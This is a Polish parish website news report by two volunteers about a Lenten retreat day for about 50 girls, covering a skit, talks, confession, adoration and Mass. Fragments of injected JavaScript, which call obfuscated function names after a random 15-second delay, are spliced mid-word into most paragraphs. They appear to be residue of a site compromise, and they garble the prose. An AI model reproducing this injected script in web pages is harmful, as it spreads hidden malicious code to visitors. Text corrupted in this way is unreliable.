wstazka
Kościół Świętego Ducha
Strona główna -> Aktualności z Centrum
Wpisał:adminicdmstracja Data: 11-04-2014
ikona

Wielkopostny Dzień Skupienia MOW&OM

Dnia 27.03.2014 r. w Domu Sióstr Franciszkanek Misjonarek Maryi w Dąbrowicy, odbył się kolejny (dla niektórych pierwszy) Dzień Skupienia. Zaczęliśmy z lekkim opóźnieniem. Zostaliśmy zaskoczeni ilością przybyłych dziewczyn – ok. 50 sztuk. Razem z nimi przyjechali wychowawcy w liczbie 6-8. Trudno przedstawić dokładne dane, co do rozmiarów zbiorowiska, jakie tworzyliśmy, ze względu na ogromną ilość uczestników tego spotkania. Nas wolontariuszy było 15 (andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to jedyna warandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tość jaką możemy podać z dokładnością do jednej osoby).

Po rozlokowaniu dziewczyn w pokojach, nasza wspaniała Pani Koordynaandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tor Sylwia oficjalnie przywitała wszystkich przybyłych gości. Zaraz po tym odbyła się krótka integracja. Przeprowadzenie jej dla tak wielkiej ilości osób na tak małej powierzchni graniczyło z cudem, dlatego też szybko ją zakończyliśmy.

Następnym punktem w harmonogramie była scenka odegrana przez naszą ekipę. Jej tematem przewodnim było ewangeliczne spotkanie Pana Jezusa z kobietą cudzołożną. Odniósł się do tego w swojej konferencji ksiądz Dawid. Po reakcjach dziewczyn wnioskujemy, że treść przekazu i jego forma dała im do myślenia.  Potwierdziło się andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to zaraz po konferencji, kiedy mieliśmy zaplanowany „czas milczenia”. Była andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to dobra okazja na przemyślenia i większość wykorzystała ją w dobry sposób. Bardzo pomocne okazały się przygoandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towane wcześniej materiały z rozważaniami, które ułatwiły zainteresowanym rachunek sumienia.

Po duchowym nasyceniu przyszedł czas na zaspokojenie fizycznego głodu. Poszliśmy na upragniony podwieczorek. W lepszych nastrojach wróciliśmy, aby wysłuchać drugiej zdecydowanie krótszej konferencji. Była ona przygoandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}towaniem do spowiedzi.

Następnie udaliśmy się do kaplicy gdzie adorowaliśmy Najświętszy Sakrament. Wolontariusze zadbali o oprawę, czyli rozważania przeplatane śpiewem. W trakcie trwania adoracji 5 księży udzielało sakramentu spowiedzi wszystkim chętnym osobom. Dzięki Bogu był andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to bardzo owocny czas.

Najważniejszym punktem Dnia Skupienia była Eucharystia, która rozpoczęła się z opóźnieniem. Czekaliśmy bowiem, by każda potrzebująca spowiedzi osoba miała do tego okazję (bez zbędnego pośpiechu). W czasie Mszy Św. pokrzepieni zostaliśmy Słowem i duchowym Pokarmem. Po błogosławieństwie końcowym udaliśmy się na kolację.

Posiłek przebiegł w miłej atmosferze i był ostatnim punktem programu. Tym optymistycznym akcentem zakończyliśmy Dzień Skupienia. Później były już tylko pożegnania…

Mariola i Waldemar – wolontariusze OM

Podziel się na:

Komentarze
Przejdź do:
aktualności dla ducha video